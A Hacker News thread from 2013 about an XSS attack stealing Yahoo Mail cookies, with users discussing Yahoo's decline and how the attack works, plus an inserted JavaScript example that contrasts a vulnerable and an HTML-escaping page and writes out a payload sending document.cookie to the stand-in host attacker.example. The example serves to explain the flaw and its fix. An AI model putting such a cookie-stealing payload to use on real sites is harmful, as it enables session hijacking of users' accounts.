Yahoo Mail users hit by widespread XSS exploit - macleanjr
http://thenextweb.com/insider/2013/01/07/yahoo-mail-users-hit-by-widespread-hacking-xss-exploit-seemingly-to-blame

======
neya
Whenever I hear something negative about Yahoo, I feel really sorry for them.
Yahoo used to be a great company a few years back. Their messenger was one of
the best products they ever had, and their mail used to be REALLY good (in the
early days). But soon they failed to adapt to the market's needs, and they
are now where they are. They COULD have been a great company if they had
put in as much effort as their competitors had put in to understanding their
market.

The best example was how they failed to respond to Gmail's popularity.
Gmail gave away for free almost every single feature that Yahoo charged (and
still charges?) a premium for. For example - mail forwarding (POP, IMAP too?)
and so on. I personally used to have a .co.uk address with them and eventually
moved to Gmail because their ads were in my face, unlike Gmail's, which are
very subtle.

Also, the UX on most of Yahoo's sites is terribly poor. Ever visited their
homepage? Looks like a cluttered fish market.

~~~
csmatt
Bad UX killed Yahoo. Intrusive, animated advertisements and a cluttered home
page are how I will always remember them. I often joke about how I test
Internet connections by going to yahoo.com in the browser since no one goes
there anymore and I won't be deceived by cache :P

~~~
TazeTSchnitzel
In the US, perhaps. The "cluttered homepage" design is popular in Japan.

~~~
jpatokal
It's not quite that simple: http://www.tofugu.com/2012/05/15/japanese-web-design-why-you-so-2003/

~~~
TazeTSchnitzel
Thanks for that, that was quite enlightening.

------
gcb0
So, why does the browser send yahoo.com cookies to a request to
abysswhatever.com when the user clicks on the link in the email?

He just created a pretty valid link with no shenanigans... last I checked, an
XSS attack was about making a site churn out JavaScript code when it was not
intended to, and then you could make a request that passed that domain's
cookies to you.

~~~
mrb
The browser doesn't send yahoo.com cookies to abysssec.com. The way XSS attacks
work in general is that the attacker's landing page probably has an invisible
iframe that GETs or POSTs to yahoo.com, with the right parameters, to trigger
an XSS with JS code that sends the cookies back to abysssec.com. All this is
invisible in the video, as the author does not want to disclose the technical
details.

~~~
bcoates
It sounds like disabling 3rd party cookies fixes this, right?

~~~
dmix
The cookie is a first-party yahoo cookie that is sent via a GET parameter to a
remote server in plain-text.

So nope that won't help.

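The mechanism mrb and dmix describe above, as an added example that is not from the thread, the video, or Yahoo: a toy page that reflects a query parameter into HTML (the reflected-XSS shape; the real Yahoo Mail vector was not disclosed, so this is an assumption), beside a hardened version that HTML-escapes the value. The hostnames mail.example and attacker.example are placeholders standing in for yahoo.com and abysssec.com. The script the attacker injects reads document.cookie in the victim's first-party origin and ships it to the attacker's host in a GET parameter, which is why blocking third-party cookies does nothing here.

```javascript
// Added example (not the original exploit): reflected XSS leaking first-party cookies.
const VICTIM_ORIGIN = 'https://mail.example';            // placeholder for yahoo.com
const ATTACKER_COLLECTOR = 'https://attacker.example/c'; // placeholder for abysssec.com

// Vulnerable: the query value is concatenated straight into the markup.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for ${q}</h1></body></html>`;
}

// Hardened: HTML-escape untrusted text before it reaches the markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderSearchHardened(q) {
  return `<html><body><h1>Results for ${escapeHtml(q)}</h1></body></html>`;
}

// The injected script: an <img> load carries document.cookie to the attacker as a
// GET parameter. An image request is not subject to the same-origin restrictions
// that would block reading a cross-origin XHR response.
const PAYLOAD =
  `<script>new Image().src="${ATTACKER_COLLECTOR}?c="+encodeURIComponent(document.cookie)</script>`;

// The URL the attacker's hidden iframe would load: a first-party request to the
// victim site, so the victim's cookies are attached and readable by the payload.
function attackUrl() {
  return `${VICTIM_ORIGIN}/search?q=${encodeURIComponent(PAYLOAD)}`;
}

// Stand-in for "the browser runs inline <script> blocks in this page", with a
// fake document.cookie and a fake Image that records the URLs it would fetch.
function executeInlineScripts(html, fakeCookie) {
  const requests = [];
  const fakeDocument = { cookie: fakeCookie };
  class FakeImage { set src(url) { requests.push(url); } }
  const re = /<script>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    new Function('document', 'Image', m[1])(fakeDocument, FakeImage);
  }
  return requests; // URLs the page would have fetched
}

// Simulate the victim's browser following the attack URL against one page version.
// The cookie values are constructed sample data.
function simulate(render) {
  const q = new URL(attackUrl()).searchParams.get('q'); // already percent-decoded
  return executeInlineScripts(render(q), 'Y=auth-token-value; T=session-token-value');
}

// What the attacker's collector sees: the cookie arrives in plain text in the query string.
function leakedCookie(requests) {
  return requests.length ? new URL(requests[0]).searchParams.get('c') : null;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable page leaks:', leakedCookie(simulate(renderSearchVulnerable)));
  console.log('hardened page leaks:', leakedCookie(simulate(renderSearchHardened)));
}
```

The hardened output still contains the payload text, just as inert `&lt;script&gt;` markup; escaping at the point where untrusted data enters HTML is the fix, not filtering the word "script" out of the input.
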
------
eric-hu
I believe my Yahoo account was hit by this, since my sent mailbox showed
messages with links similar to one I accidentally clicked (from a Gmail
account!).

The comments in this thread suggest that the attackers now have my cookies.
What can I do to invalidate old cookies for Yahoo mail?

~~~
Timothee
The least you can do is change your password. I don't know if Yahoo! can log
you out of your account in other locations, the way Gmail does.

------
xSwag
Exploit in action: <http://www.youtube.com/watch?v=iBXvebXo-F4>

It is currently being sold for $700 in various semi-public blackhat forums
(hence widespread usage).

------
ppierald
A little heads up to the Yahoo Security team probably would have been
appreciated!

~~~
daeken
It's not like this was someone revealing the vulnerability, though. The first
knowledge of it was an in-the-wild attack; not much you can do about it at
that point.

------
randallu
So does YMail have anything to do with this -- if you were logged into Yahoo
and visited the bad page then Evil, Inc would still get your Y and T cookies,
right?

I have received "Check out this cool link" emails from friends who use Yahoo
mail, but I assumed that it was just scraping their Yahoo address book...

------
mifrai
Would following their advice of changing your password actually help in this
situation? While it's a good practice in general, if I'm understanding this
right, the attacker never has your password.

~~~
mullingitover
It's an xss attack that takes advantage of the fact that you're logged in,
they don't need your password. The best way to avoid it is to only log into
your account in a separate browser that's in incognito mode. That, or log out
of your Yahoo account immediately after you've done your business with them
and don't hit any other web sites while you're logged in.

------
kbanman
I personally witnessed two instances of this attack as early as December 8. I
couldn't figure out until now how it was done.

~~~
mrb
How did you "witness" them? Were they doing js popups from yahoo.com?

------
Simucal
Already, two of my Facebook friends have reported they have been hit with this
vulnerability.

~~~
mrb
How technical are your friends? Sometimes people think they have been "hacked"
when their contacts receive spam with their name in the From: header. That is
not the case at all. Spammers simply spoof the From:. No hack required.

Besides, this XSS vulnerability is silent by nature. The victim has no idea and
no visual indication that clicking a link ends up stealing his/her Yahoo auth
cookies.

~~~
Pr0
Sure, but if the victim sends the same email to all of their friends, he or
she will surely end up finding out.

~~~
mrb
Spammers also have ways to determine your social circle (e.g. scraping
Facebook), so they can send mail to all your friends.

~~~
LarrySDonald
Depends on how visible your name->email is. I got one yesterday to my current
non-public email address (never used for anything except person to person
email, and usually not even that), from the one guy I know who uses yahoo
email. Told him he might want to make sure his AV is in shape and change his
password. Still no idea if it's from this or something else, he discovered
that he had a bit of malware (nothing extreme, your average user level) so it
could have been anything, but the timing is pretty suspicious considering his
setup has gotten infected exactly once over about the four years I've known
him (that I know of, but I have no doubt I'd be the first to know).

------
mikekij
People still use Yahoo mail?

~~~
waitwhat
More than use Gmail -- http://www.campaignmonitor.com/resources/will-it-work/email-clients/

~~~
dvhh
Read the fine print; it could mean that the iOS mail client doesn't care that
much about privacy. Almost all mail clients hide external images by default
(and have a whitelist mechanism).

